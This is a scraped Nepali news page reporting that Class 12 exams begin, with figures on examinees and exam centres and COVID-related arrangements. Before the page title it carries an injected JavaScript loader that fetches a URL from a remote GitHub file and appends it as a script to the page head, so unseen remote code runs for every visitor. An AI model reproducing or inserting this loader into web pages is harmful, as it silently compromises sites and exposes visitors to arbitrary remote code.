;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आजदेखि कक्षा १२ को परीक्षा सुरु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • आजदेखि कक्षा १२ को परीक्षा सुरु
रामेछाप बिशेष

आजदेखि कक्षा १२ को परीक्षा सुरु

मंसिर ०९,

काठमाडौं । आजदेखि कक्षा १२ को परीक्षा सुरु हुदै छ ।

मंगलबार बिहान ८ बजेदेखि परीक्षा सुरु हुदै छ । परीक्षामा ४ लाख ३२ हजार परीक्षार्थी सहभागी हुदै छन् । देशभर ४ हजार १ सय ५ वटा परीक्षा केन्द्र तोकिएको  छ ।

सरकारले  ढुक्क भएर परीक्षा दिन परीक्षार्थीहरुलाई आग्रह गरेको छ । कोरोना संक्रमित भएका परीक्षार्थीहरुको लागि छूट्टैपरीक्षा ब्यवस्था गरिएको छ । त्यस्तै संक्रमण भएर निकोभएकहरुको लागी भने परीक्षा दिन सक्ने ब्यवस्था गरेको छ ।

गत वैशाखमा सम्पन्न हुनु पर्ने परीक्षा कोरोना भाइरस संक्रमणका कारण रोकिएको हो ।

आजदेखि सुरुभएको परीक्षा आगामी १६ गते सम्पन्न हुने छ ।

फेसबुक प्रतिक्रियाहरु